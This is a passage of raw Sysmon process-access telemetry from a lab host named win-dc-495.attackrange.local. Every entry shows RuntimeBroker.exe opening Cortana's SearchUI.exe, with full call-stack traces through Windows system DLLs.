13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405460C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405456C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405456C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405352C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405352C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405276C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405984C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405984C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 